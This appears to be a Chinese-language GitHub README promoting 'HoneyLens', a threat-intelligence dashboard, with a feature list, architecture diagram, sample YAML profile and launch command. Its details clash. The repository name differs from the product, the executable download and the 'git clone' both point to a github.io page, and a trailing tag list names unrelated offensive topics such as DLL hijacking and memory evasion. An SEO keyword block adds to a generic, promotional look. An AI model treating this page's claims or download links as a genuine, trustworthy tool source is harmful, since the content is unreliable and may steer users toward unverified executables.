Wayn02/security-insights-hub

# HoneyLens: 威胁情报可视化工具 🕵️‍♂️🔭 将复杂的威胁数据流转化为具有深度洞察和可操作性的情报！HoneyLens 融合了集成式安全分析、动态仪表板以及现代 AI 驱动的洞察，重新定义了威胁狩猎的体验——所有这些都被封装在一个极具视觉沉浸感的 UI 中。深入探索威胁态势，将各个线索串联起来，用清晰的视角拨开混沌，在安全对抗中保持领先。 [](https://Wayn02.github.io) ## 🤔 为什么选择 HoneyLens？ 捕捉隐蔽的威胁不应该像破解象形文字一样困难。HoneyLens 的独特设计能够在一个充满叙事感的单一界面中，统筹协调您的 SIEM、漏洞数据和威胁情报源。HoneyLens 赋予安全团队和独立防御者实时可视化风险的能力，支持深入挖掘趋势，并以无与伦比的清晰度赋能工作流程。 ## 🔎 目录 - [核心功能](#-key-features) - [架构概览](#-mermaid-diagram) - [快速入门](#-getting-started) - [配置文件示例](#-example-profile-configuration) - [控制台调用](#-console-invocation) - [功能详情](#-feature-list) - [AI 集成](#-openai--claude-api-integration) - [操作系统兼容性](#-os-compatibility) - [多语言与响应式 UI](#-responsive-ui--multilingual-support) - [支持承诺](#-247-customer-support) - [SEO 优化详情](#-seo-friendly-keywords) - [免责声明](#-disclaimer) - [许可证](#-license) - [下载](#-download) ## 🚀 核心功能 - **统一威胁视图** 聚合来自多个来源的警报、CVE、威胁源自动化、系统遥测和异常报告。 - **AI 驱动的叙事分析** 利用 OpenAI 和 Claude API，将原始日志和事件提炼成易于理解、适合管理层阅读的叙述报告。 - **交互式仪表板** 在一个优雅且响应迅速的 UI 中进行点击、拖拽和深入挖掘，支持日间/夜间模式切换。 - **多语言集成** 全球安全视野，本土深度洞察。支持在英语、西班牙语、日语等多种语言间自由切换。 - **7x24 小时闪电支持** 全天候在线。通过聊天、工单或电话随时与我们取得联系。 - **自定义配置文件支持** 定义角色、通知规则、过滤条件集以及个人仪表板小部件。 - **API 可扩展性** 提供 REST、GraphQL 和事件流端点，用于构建自定义自动化。 ## 📊 Mermaid 图表 系统架构一览： ``` graph TD; SIEMs & Threat_Feeds --> Core_Engine Vulnerability_Scanners --> Core_Engine Core_Engine --> Dashboard Core_Engine --> AI_Integration[AI (OpenAI/Claude) Services] Dashboard --> User Dashboard --> Notification_System AI_Integration --> Visualization_Module User --> Profile_Manager Notification_System --> User Configuration[Configuration API] --> Core_Engine Language_Packages --> Dashboard ``` ## 📚 快速入门 ### 环境要求 - Node.js (>=18) - Python (>=3.10) - 现代浏览器 _(Chrome、Firefox、Edge、Safari)_ - OpenAI 和/或 Claude 的 API 凭证（高级分析功能可选） - Linux、macOS 或 Windows ### 下载与安装 **方式一：** 快速开始 - 下载最新的可执行文件包：**https://Wayn02.github.io** - [](https://Wayn02.github.io) **方式二：** 从源码构建 ``` git clone https://Wayn02.github.io cd honeylens npm install npm run build ``` ## 🧩 配置文件示例 针对高度警觉的 SOC 团队负责人的 YAML 配置： ``` profile: name: "RedQueen" role: "SOC Lead" notifications: priority: "critical" channels: - email - slack - sms dashboard: widgets: - vuln_timeline - threat_map - cve_heatmap night_mode: true language: "en-US" integrations: vcs: ["Jira", "ServiceNow"] ai_narrator: "claude" ``` ## 🖥️ 控制台调用 使用自定义配置从终端启动 HoneyLens： ``` $ honeylens --profile configs/redqueen.yaml --ai openai --port 8000 --language ja ``` ## ❤️ 功能列表 - **实时威胁时间线面板：** 可视化展示随时间推移的攻击与漏洞。 - **源集成：** 一键接入 VirusTotal、Shodan、AbuseIPDB、MISP 等。 - **AI 生成报告：** 可定制、去术语化的摘要，专为管理层和合规性设计。 - **发现结果关联：** 透视 IP、域名、哈希值或用户，将相关事件串联起来。 - **行动看板：** 直接从仪表板排队、分配和解决事件。 - **历史取证：** 流畅的性能表现，轻松导航数年的历史事件数据。 - **自定义警报引擎：** 基于正则表达式、异常或机器学习的检测机制，为您的环境量身定制。 ## 🤖 OpenAI 与 Claude API 集成 将您的 OpenAI 或 Claude API 密钥接入 HoneyLens 即可： - 以对话的流畅度总结安全事件。 - 几秒钟内自动生成补救 playbook。 - 将技术性安全细节转化为业务背景的叙述。 - 利用 AI 翻译提供多语言支持，赋能全球运营。 ## 📱 响应式 UI 与 🌍 多语言支持 - **适配手机、平板、桌面设备：** 为各种外形规格量身定制布局。 - **语言切换器：** 在超过 12 种世界语言间瞬间切换仪表板。 - **高对比度与自定义主题：** 为每位操作员提供内置的无障碍访问支持。 ## 🙋 7x24 小时客户支持 我们绝不会在部署后消失！无论日夜，随时与专注于安全领域的辅助代理取得联系，他们可以： - 快速诊断问题 - 协助团队上手 - 提供架构建议 - 指导高级 API 的使用 我们的支持堪称传奇——正如 HoneyLens 本身一样。 ## 🇺🇳 操作系统兼容性列表 | 操作系统 | 是否支持 | 深色模式 | 触控 UI | 备注 | |------------|:---------:|:---------:|:--------:|-------------------------------| | 🪟 Windows | ✅ | ✅ | ✅ | 功能完全对齐 | | 🐧 Linux | ✅ | ✅ | ✅ | 针对 GNOME/KDE 优化 | | 🍎 macOS | ✅ | ✅ | ✅ | 原生菜单栏集成 | | 📱 iOS | ✅ | ✅ | ✅ | iPad/iPhone 自适应 | | 🤖 Android | ✅ | ✅ | ✅ | 已在 Pixel 和 Samsung 设备上测试 | ## 🌐 SEO 友好关键词 - 下一代威胁情报仪表板 - 安全分析可视化平台 - AI 驱动的 SOC 自动化 - 漏洞与事件关联工具 - 实时网络风险监控应用 - 跨平台防御作战控制台 - 自适应威胁狩猎仪表板 AI HoneyLens 旨在让那些寻求集成式、创新性且由 AI 增强的威胁态势可视化平台的用户能够轻松发现并爱上它。 ## ⚖️ 免责声明 HoneyLens 是一款可视化与分析平台。其提供旨在用于专业的防御性操作、研究及企业用途。严禁将其滥用于进攻性或未授权的活动。请始终在适用法律和组织政策的范围内操作。 ## 📜 许可证 HoneyLens 基于 MIT 许可证发布。 [查看许可证](./LICENSE) [](https://Wayn02.github.io) _© 2026 HoneyLens 威胁情报可视化工具。保留所有权利。_

标签：AI安全, Chat Copilot, CISA项目, Claude API, CVE, DLL 劫持, DNS枚举, ELK, FOFA, IPv6支持, ITDR, MITM代理, OpenAI, Petitpotam, TSDB, 互联网扫描, 内存规避, 加密, 可视化仪表盘, 大语言模型, 威胁分析, 威胁情报, 安全分析平台, 安全态势感知, 安全报告, 安全运营, 开发者工具, 异常检测, 扫描框架, 数字签名, 数据可视化, 无线安全, 时间线生成, 漏洞扫描器, 结构化查询, 网络安全工具, 自动化侦查工具, 自动化安全, 逆向工具